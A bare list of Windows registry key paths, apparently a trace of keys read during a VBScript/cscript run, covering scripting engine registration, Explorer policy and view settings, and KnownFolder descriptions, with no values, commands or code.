HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\ScriptEngine\(Default)
HKEY_CURRENT_USER\Software\Classes\VBScript
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBScript\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBScript\CLSID\(Default)
HKEY_CURRENT_USER\Software\Classes\TypeLib
HKEY_CURRENT_USER\Software\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\409
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\9
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\0\win32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\cscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c5-5f87-11ed-b63d-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c5-5f87-11ed-b63d-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c5-5f87-11ed-b63d-806e6f6e6963}\Generation
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory
HKEY_CLASSES_ROOT\Directory
HKEY_CURRENT_USER\Software\Classes\Directory\CurVer
HKEY_CURRENT_USER\Software\Classes\Directory\
HKEY_CURRENT_USER\Software\Classes\Directory\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Folder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_CURRENT_USER\Software\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_CURRENT_USER\Software\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_CURRENT_USER\Software\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid
HKEY_CURRENT_USER\Software\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_CURRENT_USER\Software\Classes\Directory\AlwaysShowExt
HKEY_CURRENT_USER\Software\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\KnownFolders
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\KnownFolderSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InfoTip
